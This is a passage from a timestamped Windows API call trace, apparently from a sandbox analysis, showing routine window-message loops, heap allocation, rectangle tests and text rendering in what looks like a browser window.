_CIatan2 () returned 0x20 [0113.736] ExtTextOutW (hdc=0x14010a11, x=408, y=110, options=0x4, lprect=0x228558, lpString=" ", c=0x1, lpDx=0x228590) returned 1 [0113.736] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] LsDestroyLine () returned 0x0 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] SelectObject (hdc=0x14010a11, h=0x18a002e) returned 0x180a09ad [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] BitBlt (hdc=0x280101d0, x=0, y=152, cx=714, cy=140, hdcSrc=0x14010a11, x1=0, y1=0, rop=0xcc0020) returned 1 [0113.737] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ac540 | out: hHeap=0x450000) returned 1 [0113.737] GetStockObject (i=15) returned 0x188000b [0113.737] SelectPalette (hdc=0x280101d0, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0113.737] EndPaint (hWnd=0x201f2, lpPaint=0x22f308) returned 1 [0113.737] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22eec4, cPoints=0x1 | out: lpPoints=0x22eec4) returned 19333483 [0113.737] DeleteObject (ho=0x1c0406de) returned 1 [0113.737] GetCurrentThreadId () returned 0xe9c [0113.737] GetCurrentThreadId () returned 0xe9c [0113.737] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.737] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.737] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.737] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.738] KillTimer (hWnd=0x201f2, uIDEvent=0x1000) returned 1 [0113.738] GetCurrentThreadId () returned 0xe9c [0113.738] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.738] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.738] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.738] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.738] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.738] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.738] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.738] SetTimer (hWnd=0x201f2, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0113.738] GetCurrentThreadId () returned 0xe9c [0113.738] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.738] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.738] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.738] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.837] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.837] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.837] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.837] KillTimer (hWnd=0x201f2, uIDEvent=0x1008) returned 1 [0113.837] GetCurrentThreadId () returned 0xe9c [0113.837] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.976] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.977] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.977] GetCapture () returned 0x0 [0113.977] WindowFromPoint (Point=0x350) returned 0x201f2 [0113.977] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.977] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0113.977] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0113.977] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0113.977] GetCurrentThreadId () returned 0xe9c [0113.977] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0114.288] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0114.288] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0114.289] GetCapture () returned 0x0 [0114.289] WindowFromPoint (Point=0x350) returned 0x201f2 [0114.289] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0114.289] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0114.289] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0114.289] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0114.289] GetCurrentThreadId () returned 0xe9c [0114.289] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0114.632] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0114.632] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0114.632] GetCapture () returned 0x0 [0114.632] WindowFromPoint (Point=0x350) returned 0x201f2 [0114.632] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0114.632] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0114.632] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0114.632] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0114.632] GetCurrentThreadId () returned 0xe9c [0114.632] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0114.959] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0114.959] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0114.959] GetCapture () returned 0x0 [0114.959] WindowFromPoint (Point=0x350) returned 0x201f2 [0114.960] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0114.960] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0114.960] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0114.960] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0114.960] GetCurrentThreadId () returned 0xe9c [0114.960] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0115.271] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0115.271] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0115.272] GetCapture () returned 0x0 [0115.272] WindowFromPoint (Point=0x350) returned 0x201f2 [0115.272] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0115.272] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0115.272] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0115.272] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0115.272] GetCurrentThreadId () returned 0xe9c [0115.272] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0115.586] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0115.586] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0115.586] GetCapture () returned 0x0 [0115.586] WindowFromPoint (Point=0x350) returned 0x201f2 [0115.586] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0115.586] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0115.586] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0115.586] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0115.586] GetCurrentThreadId () returned 0xe9c [0115.586] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0115.895] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0115.895] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0115.895] GetCapture () returned 0x0 [0115.895] WindowFromPoint (Point=0x350) returned 0x201f2 [0115.896] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0115.896] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0115.896] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0115.896] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0115.896] GetCurrentThreadId () returned 0xe9c [0115.896] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0116.207] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0116.207] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0116.207] GetCapture () returned 0x0 [0116.207] WindowFromPoint (Point=0x350) returned 0x201f2 [0116.208] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0116.208] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0116.208] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0116.208] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0116.208] GetCurrentThreadId () returned 0xe9c [0116.208] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0116.520] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0116.520] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0116.520] GetCapture () returned 0x0 [0116.520] WindowFromPoint (Point=0x350) returned 0x201f2 [0116.520] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0116.520] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0116.520] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0116.520] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0116.520] GetCurrentThreadId () returned 0xe9c [0116.520] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0116.832] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0116.832] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0116.832] GetCapture () returned 0x0 [0116.832] WindowFromPoint (Point=0x350) returned 0x201f2 [0116.832] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0116.832] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0116.832] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0116.832] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0116.832] GetCurrentThreadId () returned 0xe9c [0116.832] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0117.143] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0117.143] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0117.143] GetCapture () returned 0x0 [0117.144] WindowFromPoint (Point=0x350) returned 0x201f2 [0117.144] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0117.144] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0117.144] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0117.144] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0117.144] GetCurrentThreadId () returned 0xe9c [0117.144] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0117.455] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0117.455] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0117.456] GetCapture () returned 0x0 [0117.456] WindowFromPoint (Point=0x350) returned 0x201f2 [0117.456] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0117.456] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0117.456] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0117.456] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0117.456] GetCurrentThreadId () returned 0xe9c [0117.456] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0117.767] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0117.767] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0117.767] GetCapture () returned 0x0 [0117.768] WindowFromPoint (Point=0x350) returned 0x201f2 [0117.768] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0117.768] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0117.768] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0117.768] PtInRect (lprc=0x22f178, pt=0x1e5) returned 1 [0117.768] GetCurrentThreadId () returned 0xe9c [0117.768] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0118.079] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0118.079] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0118.079] GetCapture () returned 0x0 [0118.080] WindowFromPoint (Point=0x520) returned 0x100f8 [0118.080] IsChild (hWndParent=0x201f2, hWnd=0x100f8) returned 0 [0118.080] GetMessageTime () returned 166203 [0118.080] GetMessagePos () returned 0x1fa0520 [0118.080] KillTimer (hWnd=0x30204, uIDEvent=0x2000) returned 1 [0118.080] GetCapture () returned 0x0 [0118.080] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f354 | out: lpPoint=0x22f354) returned 1 [0118.080] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4c7bd8 [0118.081] GetCurrentThreadId () returned 0xe9c [0118.081] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0118.081] GetCurrentThreadId () returned 0xe9c [0118.081] GetCurrentThreadId () returned 0xe9c [0118.081] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f358 | out: lpPoint=0x22f358) returned 1 [0118.081] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0118.081] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0118.082] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f358 | out: lpPoint=0x22f358) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0118.082] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0118.082] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x2a3, wParam=0x0, lParam=0x0, plResult=0x22f44c | out: plResult=0x22f44c) returned 0x1 [0118.082] NtdllDefWindowProc_W () returned 0x0 [0118.082] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c7bd8 | out: hHeap=0x450000) returned 1 [0118.082] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0118.082] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0126.028] NtdllDefWindowProc_W () returned 0x1 [0126.028] NtdllDefWindowProc_W () returned 0x1 [0126.028] NtdllDefWindowProc_W () returned 0x1 [0126.141] NtdllDefWindowProc_W () returned 0x1 [0126.141] NtdllDefWindowProc_W () returned 0x1 [0126.141] NtdllDefWindowProc_W () returned 0x1 [0249.780] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0249.780] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f358 | out: lpRect=0x22f358) returned 1 [0249.780] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f368 | out: lpPoint=0x22f368) returned 1 [0249.780] PtInRect (lprc=0x22f358, pt=0x217) returned 1 [0249.780] GetCurrentThreadId () returned 0xe9c [0249.781] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0249.781] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f3d8 | out: lpPoint=0x22f3d8) returned 1 [0249.781] GetMessageTime () returned 166203 [0249.781] GetMessagePos () returned 0x1fa0520 [0249.782] GetCapture () returned 0x0 [0249.782] IntersectRect (in: lprcDst=0x22edc8, lprcSrc1=0x22edc8, lprcSrc2=0x22ee58 | out: lprcDst=0x22edc8) returned 1 [0249.782] IntersectRect (in: lprcDst=0x22eb84, lprcSrc1=0x22eb84, lprcSrc2=0x22eb54 | out: lprcDst=0x22eb84) returned 1 [0249.782] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22eb74 | out: lprcDst=0x22ee68) returned 1 [0249.782] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.782] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02b0 [0249.783] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22eb94 | out: lprcDst=0x22ee68) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e958, lprcSrc1=0x22e958, lprcSrc2=0x22ee58 | out: lprcDst=0x22e958) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e958, lprcSrc1=0x22e958, lprcSrc2=0x22ee58 | out: lprcDst=0x22e958) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e714, lprcSrc1=0x22e714, lprcSrc2=0x22e6e4 | out: lprcDst=0x22e714) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e704 | out: lprcDst=0x22ee68) returned 1 [0249.783] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.783] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02e0 [0249.783] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e724 | out: lprcDst=0x22ee68) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e4e8, lprcSrc1=0x22e4e8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e4e8) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e4e8, lprcSrc1=0x22e4e8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e4e8) returned 1 [0249.783] IntersectRect (in: lprcDst=0x22e32c, lprcSrc1=0x22e32c, lprcSrc2=0x22e1c8 | out: lprcDst=0x22e32c) returned 1 [0249.783] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.783] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c0310 [0249.783] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e31c | out: lprcDst=0x22ee68) returned 1 [0249.784] IntersectRect (in: lprcDst=0x22e1d8, lprcSrc1=0x22e1d8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e1d8) returned 1 [0249.784] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e33c | out: lprcDst=0x22ee68) returned 1 [0249.784] PostMessageW (hWnd=0x30204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0249.785] LsSetDoc () returned 0x0 [0249.785] LsCreateLine () returned 0x0 [0249.785] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.787] LsDestroyLine () returned 0x0 [0249.787] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.792] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.798] PtInRect (lprc=0x22e07c, pt=0xd066) returned 0 [0249.799] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c0310 | out: hHeap=0x450000) returned 1 [0249.799] IntersectRect (in: lprcDst=0x22e5a8, lprcSrc1=0x22e5a8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e5a8) returned 1 [0249.801] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0249.801] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0249.801] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.802] SetTimer (hWnd=0x30204, nIDEvent=0x2001, uElapse=0x12c, lpTimerFunc=0x0) returned 0x2001 [0249.802] PtInRect (lprc=0x22f130, pt=0x217) returned 1 [0249.802] PtInRect (lprc=0x22efd4, pt=0xd066) returned 1 [0249.802] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0249.803] GetCursor () returned 0x10003 [0249.803] GetCurrentThreadId () returned 0xe9c [0249.803] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0249.803] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0249.803] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0249.803] GetMessageTime () returned 294717 [0249.803] GetMessagePos () returned 0x1450382 [0249.803] GetCapture () returned 0x0 [0249.803] GetCurrentThreadId () returned 0xe9c [0249.803] GetCurrentThreadId () returned 0xe9c [0249.803] GetCurrentThreadId () returned 0xe9c [0249.803] IntersectRect (in: lprcDst=0x22ee50, lprcSrc1=0x22ee50, lprcSrc2=0x22eee0 | out: lprcDst=0x22ee50) returned 1 [0249.803] IntersectRect (in: lprcDst=0x22ec0c, lprcSrc1=0x22ec0c, lprcSrc2=0x22ebdc | out: lprcDst=0x22ec0c) returned 1 [0249.803] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ebfc | out: lprcDst=0x22eef0) returned 1 [0249.803] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.803] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02b0 [0249.804] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ec1c | out: lprcDst=0x22eef0) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e79c, lprcSrc1=0x22e79c, lprcSrc2=0x22e76c | out: lprcDst=0x22e79c) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e78c | out: lprcDst=0x22eef0) returned 1 [0249.804] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.804] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02e0 [0249.804] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e7ac | out: lprcDst=0x22eef0) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e570, lprcSrc1=0x22e570, lprcSrc2=0x22eee0 | out: lprcDst=0x22e570) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e570, lprcSrc1=0x22e570, lprcSrc2=0x22eee0 | out: lprcDst=0x22e570) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e3b4, lprcSrc1=0x22e3b4, lprcSrc2=0x22e250 | out: lprcDst=0x22e3b4) returned 1 [0249.804] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.804] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c0310 [0249.804] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e3a4 | out: lprcDst=0x22eef0) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22e260, lprcSrc1=0x22e260, lprcSrc2=0x22eee0 | out: lprcDst=0x22e260) returned 1 [0249.804] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e3c4 | out: lprcDst=0x22eef0) returned 1 [0249.804] LsSetDoc () returned 0x0 [0249.804] LsCreateLine () returned 0x0 [0249.804] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] LsDestroyLine () returned 0x0 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] 